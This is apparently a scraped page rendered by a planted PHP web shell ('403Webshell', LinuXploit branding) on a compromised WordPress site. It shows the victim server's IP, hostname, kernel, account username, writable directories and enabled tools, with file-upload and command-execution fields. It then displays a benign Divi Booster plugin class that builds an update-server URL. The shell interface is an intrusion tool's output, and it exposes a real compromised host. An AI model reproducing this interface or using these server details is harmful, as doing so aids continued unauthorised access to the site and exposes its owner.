403Webshell
Server IP : 213.186.33.4  /  Your IP : 216.73.216.222
Web Server : Apache
System : Linux webm005.cluster103.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : karinebmkh ( 644538)
PHP Version : 8.4.22
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/karinebmkh/www/wp-content/plugins/divi-booster/core/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/karinebmkh/www/wp-content/plugins/divi-booster/core/classes/DBDBUpdateServer.php
<?php
if (!class_exists('DBDBUpdateServer')) {
	class DBDBUpdateServer {
	 
		private $url;
        private $wp;
	 
		static function create(DBDBAnyWp $wp=null) {
            $wp = is_null($wp)?DBDBWp::create():$wp;
			return new self($wp);
		}
		
		private function __construct(DBDBAnyWp $wp) {
			$this->url = 'https://d3mraia2v9t5x8.cloudfront.net';
            $this->wp = $wp;
		}
		
		public function url($path='') {
			return $this->url.'/'.$path;
		}
		
		public function updatesUrl() {
			return $this->wp->apply_filters('dbdb_update_url', $this->url('updates.json'));
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit